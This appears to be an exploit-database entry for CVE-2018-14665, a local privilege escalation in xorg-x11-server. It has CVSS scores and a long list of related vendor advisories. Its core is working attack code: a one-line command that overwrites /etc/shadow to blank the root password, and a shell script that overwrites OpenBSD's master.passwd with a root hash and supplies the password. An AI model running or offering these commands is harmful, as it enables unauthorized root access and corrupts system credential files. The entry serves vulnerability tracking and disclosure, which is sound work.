Lucene search
Hacker FantasticEXPLOITPACK:ADC2F0547F06456887993FC83AC31CB3HistoryOct 25, 2018 - 12:00 a.m.
xorg-x11-server 1.20.3 - Local Privilege Escalation
2018-10-2500:00:00
Hacker Fantastic
16
6.6 Medium
CVSS3
Attack Vector
PHYSICAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
xorg-x11-server 1.20.3 - Local Privilege Escalation
#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root.
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD.
#
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back
echo [+] type 'Password1' and hit enter for root
su -
EBB Note ~ Another version of it: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850Related
nessus
nessus
AIX 6.1 TL 9 : xorg (IJ11000)
2018-12-13 00:00:00
EulerOS Virtualization for ARM 64 3.0.2.0 : xorg-x11-server (EulerOS-SA-2020-1236)
2020-03-13 00:00:00
Fedora 29 : xorg-x11-server (2018-4ab08fedd6)
2019-01-03 00:00:00
openvas
openvas
Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2019-2553)
2020-01-23 00:00:00
openSUSE: Security Advisory for xorg-x11-server (openSUSE-SU-2018:3800-1)
2018-11-17 00:00:00
Debian Security Advisory DSA 4328-1 (xorg-server - security update)
2018-10-25 00:00:00
exploitpack
exploitpack
xorg-x11-server 1.20.3 (Solaris 11) - inittab Local Privilege Escalation
2019-01-14 00:00:00
xorg-x11-server 1.20.1 - Local Privilege Escalation
2018-11-13 00:00:00
xorg-x11-server 1.20.3 - Privilege Escalation
2018-10-30 00:00:00
packetstorm
packetstorm
Xorg X11 Server SUID Privilege Escalation
2018-11-25 00:00:00
Xorg X11 Server SUID modulepath Privilege Escalation
2019-10-22 00:00:00
xorg-x11-server 1.20.3 Privilege Escalation
2018-10-31 00:00:00
fedora
fedora
[SECURITY] Fedora 28 Update: xorg-x11-server-1.19.6-10.fc28
2018-11-08 02:20:52
[SECURITY] Fedora 29 Update: xorg-x11-server-1.20.3-1.fc29
2018-11-05 02:01:32
avleonov
avleonov
What is a vulnerability and what is not?
2019-01-28 09:41:51
metasploit
metasploit
Xorg X11 Server SUID modulepath Privilege Escalation
2018-11-25 21:54:37
Xorg X11 Server Local Privilege Escalation
2019-02-06 11:42:40
Xorg X11 Server SUID logfile Privilege Escalation
2018-11-11 07:43:36
centos
centos
xorg security update
2018-11-15 19:12:13
debiancve
debiancve
CVE-2018-14665
2018-10-25 20:29:00
suse
suse
Security update for xorg-x11-server (moderate)
2018-11-17 00:12:28
zdt
zdt
Xorg X11 Server Local Privilege Escalation Exploit
2019-11-13 00:00:00
Xorg X11 Server SUID modulepath Privilege Escalation Exploit
2019-10-22 00:00:00
xorg-x11-server 1.20.3 - Local Privilege Escalation Exploit (2)
2018-10-26 00:00:00
kitploit
kitploit
Emp3R0R - Linux Post-Exploitation Framework Made By Linux User
2021-01-09 11:30:00
threatpost
threatpost
X.Org Flaw Allows Privilege Escalation in Linux Systems
2018-10-29 16:13:26
osv
osv
CVE-2018-14665
2018-10-25 20:29:00
xorg-server - security update
2018-10-25 00:00:00
cve
cve
CVE-2018-14665
2018-10-25 20:29:00
ubuntu
ubuntu
X.Org X server vulnerability
2018-10-26 00:00:00
gentoo
gentoo
X.Org X Server: Privilege escalation
2018-10-30 00:00:00
aix
aix
ubuntucve
ubuntucve
CVE-2018-14665
2018-10-25 00:00:00
thn
thn
New Privilege Escalation Flaw Affects Most Linux Distributions
2018-10-26 13:58:00
alpinelinux
alpinelinux
CVE-2018-14665
2018-10-25 20:29:00
redhatcve
redhatcve
CVE-2018-14665
2018-10-25 14:51:04
redhat
redhat
(RHSA-2018:3410) Important: xorg-x11-server security update
2018-10-30 14:57:30
veracode
veracode
Arbitrary Code Execution
2019-01-15 09:25:46
oraclelinux
oraclelinux
xorg-x11-server security update
2018-11-07 00:00:00
Xorg security and bug fix update
2019-08-13 00:00:00
ibm
ibm
f5
f5
K03073656 : X.Org X server vulnerability CVE-2018-14665
2018-11-23 00:00:00
prion
prion
Code injection
2018-10-25 20:29:00
archlinux
archlinux
[ASA-201810-15] xorg-server: privilege escalation
2018-10-29 00:00:00
mageia
mageia
Updated x11-server packages fix security vulnerability
2018-10-27 12:45:46
debian
debian
[SECURITY] [DSA 4328-1] xorg-server security update
2018-10-25 21:31:28
exploitdb
exploitdb
xorg-x11-server < 1.20.3 (Solaris 11) - 'inittab Local Privilege Escalation
2019-01-14 00:00:00
xorg-x11-server < 1.20.1 - Local Privilege Escalation
2018-11-13 00:00:00
Xorg X11 Server - SUID privilege escalation (Metasploit)
2018-11-26 00:00:00
6.6 Medium
CVSS3
Attack Vector
PHYSICAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
Related for EXPLOITPACK:ADC2F0547F06456887993FC83AC31CB3